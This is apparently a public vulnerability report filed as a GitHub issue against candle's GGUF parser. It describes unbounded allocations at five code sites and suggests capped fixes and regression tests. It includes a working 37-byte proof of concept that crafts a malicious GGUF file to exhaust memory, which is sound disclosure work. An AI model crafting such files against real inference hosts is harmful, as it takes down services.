Unguarded allocation sites in candle-core/src/quantized/gguf_file.rs (DoS via crafted GGUF) #3533

Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.

### Summary

`candle-core/src/quantized/gguf_file.rs` (current `main`, commit `24b0b28`+) reads several length / count fields from a GGUF file as `u32`/`u64` and uses them directly as the size argument of `vec![T; n]`, `Vec::with_capacity(n)`, and `for _ in 0..n` loops with no upper-bound check. A small (< 64-byte) GGUF file that declares `2^32` items drives the loader into multi-GB allocation or extremely long iteration, killing the host or its inference workload.

Same bug class as CVE-2025-66960 (ollama `fs/ggml/gguf.go`, fixed). In candle, the same pattern recurs across five sites. The sibling crate `safetensors` in the same org explicitly caps with `MAX_HEADER_SIZE` + `buffer.get` slicing — candle's GGUF loader did not adopt that pattern.

### Affected sites

All in `candle-core/src/quantized/gguf_file.rs`:

**(a) L99 — `read_string` length buffer:**

```rust
let len = match magic {
    VersionedMagic::GgufV1 => reader.read_u32::<LittleEndian>()? as usize,
    VersionedMagic::GgufV2 | VersionedMagic::GgufV3 => {
        reader.read_u64::<LittleEndian>()? as usize
    }
};
let mut v = vec![0u8; len];        // <-- immediate physical alloc of `len` bytes
reader.read_exact(&mut v)?;
```

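`vec![0u8; len]` requests all `len` bytes from the allocator before any payload has been read, so `len = 2^32` asks for 4 GiB up front. Whether those pages become resident immediately depends on the allocator and the OS overcommit policy (zeroed allocations are often mapped lazily), but on hosts with memory limits or without overcommit the request alone can abort the process.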
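One way to avoid trusting `len` at all is to let the buffer grow only as bytes actually arrive. The following is a minimal sketch, not candle's code: `read_len_prefixed` and `MAX_STRING_LEN` are hypothetical names, and it uses `std::io` only rather than the crate's own `Result` type.

```rust
use std::io::{self, Read};

/// Hypothetical cap for illustration; not a value taken from candle.
const MAX_STRING_LEN: u64 = 1 << 26;

/// Reads `len` bytes after checking the declared length against the cap.
/// The buffer grows only as data arrives, so a tiny file cannot force a
/// large allocation just by declaring a large length.
fn read_len_prefixed<R: Read>(reader: &mut R, len: u64) -> io::Result<Vec<u8>> {
    if len > MAX_STRING_LEN {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("declared length {len} exceeds cap {MAX_STRING_LEN}"),
        ));
    }
    let mut buf = Vec::new();
    // `take` stops after `len` bytes; `read_to_end` extends `buf` incrementally.
    let got = reader.by_ref().take(len).read_to_end(&mut buf)?;
    if got as u64 != len {
        return Err(io::Error::new(
            io::ErrorKind::UnexpectedEof,
            "input ended before the declared length",
        ));
    }
    Ok(buf)
}
```

With this shape, a truncated file fails with `UnexpectedEof` after reading only the bytes that exist, and the cap still rejects absurd lengths before any I/O happens.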

**(b) L306 — `Value::read` ARRAY branch:**

```rust
let len = match magic { ... };
let mut vs = Vec::with_capacity(len);
for _ in 0..len {
    vs.push(Value::read(reader, value_type, magic)?)
}
```
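`Vec::with_capacity(len)` reserves `len * size_of::<Value>()` bytes before the first element is parsed. A hedged sketch of one alternative is to cap the count and cap the pre-allocation separately, so the vector grows past that point only as elements are actually read. The element type is simplified to `u32` here, and `MAX_ARRAY_ELEMENTS`, `PREALLOC_LIMIT`, and `read_u32_array` are hypothetical names, not candle APIs.

```rust
use std::io::{self, Read};

/// Hypothetical limits for illustration only.
const MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const PREALLOC_LIMIT: usize = 1024;

/// Reads `len` little-endian `u32` values without pre-allocating more than
/// `PREALLOC_LIMIT` elements on the strength of the declared length alone.
fn read_u32_array<R: Read>(reader: &mut R, len: usize) -> io::Result<Vec<u32>> {
    if len > MAX_ARRAY_ELEMENTS {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("array length {len} exceeds max {MAX_ARRAY_ELEMENTS}"),
        ));
    }
    // Reserve a bounded amount; `push` grows the vector if real data follows.
    let mut vs = Vec::with_capacity(len.min(PREALLOC_LIMIT));
    for _ in 0..len {
        let mut bytes = [0u8; 4];
        // A truncated input fails here on the first missing element.
        reader.read_exact(&mut bytes)?;
        vs.push(u32::from_le_bytes(bytes));
    }
    Ok(vs)
}
```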

**(c) L421 — `tensor_count` outer loop:**

```rust
let tensor_count = ... reader.read_u64::<LittleEndian>()? as usize;
for _idx in 0..tensor_count {
    let tensor_name = read_string(reader, &magic)?;
    ...
}
```

**(d) L413 — `metadata_kv_count`:** Same shape as (c).
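For the two count fields, a fixed cap is one option; another is to compare the declared count against what the input can physically hold. The sketch below assumes the reader implements `Seek` and that every entry occupies at least some minimum number of bytes. `remaining_bytes` and `check_count` are hypothetical helpers, not part of candle.

```rust
use std::io::{self, Seek, SeekFrom};

/// Bytes between the current position and the end of the stream.
fn remaining_bytes<S: Seek>(s: &mut S) -> io::Result<u64> {
    let pos = s.stream_position()?;
    let end = s.seek(SeekFrom::End(0))?;
    s.seek(SeekFrom::Start(pos))?; // restore the original position
    Ok(end.saturating_sub(pos))
}

/// Rejects a declared count that the remaining input could not possibly hold.
fn check_count<S: Seek>(s: &mut S, count: u64, min_entry_bytes: u64) -> io::Result<usize> {
    let remaining = remaining_bytes(s)?;
    // `checked_mul` treats arithmetic overflow as an invalid count.
    let fits = count
        .checked_mul(min_entry_bytes)
        .map_or(false, |needed| needed <= remaining);
    if !fits {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("declared count {count} does not fit in {remaining} remaining bytes"),
        ));
    }
    usize::try_from(count).map_err(|e| io::Error::new(io::ErrorKind::InvalidData, e))
}
```

As an illustration, a v2/v3 tensor entry with an empty name and zero dimensions would need roughly 24 bytes (8 for the name length, 4 for `n_dimensions`, 4 for the dtype, 8 for the offset); that figure is an assumption for the example, not a constant from the codebase. Under it, a count of `2^32` against a 64-byte file is rejected before the loop starts.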

**(e) L427 / L432 — tensor dimensions vector:**

```rust
let n_dimensions = reader.read_u32::<LittleEndian>()?;
let mut dimensions = vec![0; n_dimensions as usize];    // <-- alloc
reader.read_u32_into::<LittleEndian>(&mut dimensions)?;
```

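As written, `read_u32_into` fills a `Vec<u32>` (4 bytes/element, about 16 GiB for `n_dimensions = 2^32 − 1`). GGUF v2/v3 store dimensions as `u64`, so on that path the buffer is 8 bytes/element and the same count requests about 32 GiB immediately.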
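The sizes quoted for these sites are simply element count times element width. A small worked check, with hypothetical helper names `alloc_bytes` and `as_gib`:

```rust
const GIB: f64 = (1u64 << 30) as f64;

/// Bytes requested when allocating `count` elements of `elem_size` bytes each,
/// or `None` if the product overflows `u64`.
fn alloc_bytes(count: u64, elem_size: u64) -> Option<u64> {
    count.checked_mul(elem_size)
}

/// Converts a byte count to GiB for display.
fn as_gib(bytes: u64) -> f64 {
    bytes as f64 / GIB
}
```

For `count = 2^32 - 1`, 8-byte elements give 34,359,738,360 bytes (just under 32 GiB) and 4-byte elements give 17,179,869,180 bytes (just under 16 GiB); a `2^32`-byte string buffer is exactly 4 GiB.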

### Reachability

`gguf_file::Content::read` is the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.

### Minimal PoC — 37 bytes

```python
import struct
malicious = (
    b'GGUF'
    + struct.pack('<I', 3)
    + struct.pack('<Q', 1)               # tensor_count = 1
    + struct.pack('<Q', 0)               # kv_count = 0
    + struct.pack('<Q', 1) + b't'        # name length = 1, name = 't'
    + struct.pack('<I', 0xFFFFFFFF)      # n_dimensions = 2^32 - 1
)
with open('/tmp/evil.gguf', 'wb') as f:
    f.write(malicious)
```

```rust
use candle_core::quantized::gguf_file;
use std::fs::File;

fn main() {
    let mut f = File::open("/tmp/evil.gguf").unwrap();
    // Requests vec![0; 2^32 - 1] with 8-byte elements: about 32 GB.
    let _ = gguf_file::Content::read(&mut f);
}
```

### Suggested fix

Mirror the `safetensors` pattern. Define caps and gate each allocation:

```rust
const GGUF_MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const GGUF_MAX_STRING_LENGTH:  usize = 1 << 26;
const GGUF_MAX_TENSOR_DIMS:    usize = 8;

fn read_string<R: Read>(reader: &mut R, magic: &VersionedMagic) -> Result<String> {
    let len = ...;
    if len > GGUF_MAX_STRING_LENGTH {
        crate::bail!("GGUF string length {len} exceeds max {GGUF_MAX_STRING_LENGTH}")
    }
    let mut v = vec![0u8; len];
    reader.read_exact(&mut v)?;
    ...
}
```

Equivalent gates at L306, L413, L421, L427. The C++ baseline `ggml/src/gguf.cpp` enforces the same caps after PR ggml-org/llama.cpp#19856.
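Since the same gate is needed at every site, a single helper could carry both the cap and the integer conversion. The sketch below is an assumption about how that might look, not existing candle code; `checked_len` is a hypothetical name and it returns `std::io::Result` for self-containment. It uses `usize::try_from` rather than `as usize`, because `as` silently truncates a `u64` on 32-bit targets.

```rust
use std::io;

/// Converts a length or count read from the file into a `usize`,
/// rejecting values above `max` or too large for the platform.
fn checked_len(value: u64, max: usize, what: &str) -> io::Result<usize> {
    let n = usize::try_from(value).map_err(|_| {
        io::Error::new(
            io::ErrorKind::InvalidData,
            format!("GGUF {what} {value} does not fit in usize"),
        )
    })?;
    if n > max {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            format!("GGUF {what} {n} exceeds max {max}"),
        ));
    }
    Ok(n)
}
```

Each site would then pass its raw field and its own cap, for example `checked_len(raw, GGUF_MAX_TENSOR_DIMS, "tensor dims")?`, before any `vec!` or `with_capacity` call.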

Regression tests should cover each site with an oversized value and assert that the parser returns `Err` (not OOM).
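As a starting point for such tests, the PoC payload can be built in Rust directly. This sketch only constructs the bytes; `crafted_gguf` is a hypothetical helper, and the field layout is copied from the Python PoC in this report.

```rust
/// Builds the 37-byte payload from the PoC: a GGUF v3 header declaring one
/// tensor whose `n_dimensions` field is 2^32 - 1.
fn crafted_gguf() -> Vec<u8> {
    let mut buf = Vec::new();
    buf.extend_from_slice(b"GGUF"); // magic
    buf.extend_from_slice(&3u32.to_le_bytes()); // version
    buf.extend_from_slice(&1u64.to_le_bytes()); // tensor_count
    buf.extend_from_slice(&0u64.to_le_bytes()); // metadata_kv_count
    buf.extend_from_slice(&1u64.to_le_bytes()); // tensor name length
    buf.extend_from_slice(b"t"); // tensor name
    buf.extend_from_slice(&u32::MAX.to_le_bytes()); // n_dimensions
    buf
}
```

A regression test could wrap the result in `std::io::Cursor`, pass it to `gguf_file::Content::read`, and assert that the call returns `Err`. The other sites can be covered the same way by swapping in an oversized string length, array length, or count.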

### CWE

- CWE-770 (Allocation of Resources Without Limits or Throttling)
- CWE-1284 (Improper Validation of Specified Quantity in Input)
- CWE-400 (Uncontrolled Resource Consumption)

### CVE

If a CVE assignment is in scope here, happy to coordinate.
